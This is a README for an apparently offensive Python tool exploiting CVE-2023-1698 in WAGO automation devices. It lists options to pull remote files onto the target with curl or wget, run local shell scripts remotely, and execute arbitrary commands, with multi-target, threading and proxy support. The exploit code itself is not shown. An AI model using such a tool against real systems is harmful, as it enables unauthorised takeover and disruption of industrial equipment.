# WAGO-CVE-2023-1698
## Attention
I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!


## Description
WAGO is a company specializing in electrical interconnection, automation, and interface electronic technology. In multiple products of WAGO, a vulnerability allows unauthenticated remote attackers to create new users and change device configurations, which may lead to remote RCE, denial of service, and damage to the entire system.

## installation
> pip install -r requirements.txt

## Tools Usage
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename

## Params
>--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Specify a remote file URL, which will upload the file to the tmp directory or current directory through curl or wget
> --local-file-include,解析本地的shell脚本文件并在远端执行,Parse local shell script files and execute them remotely
>--remote-command REMOTE 执行一条系统命令,Execute a system command

## Example
>python -u ** --proxy --remote-command "cat /var/log/wago"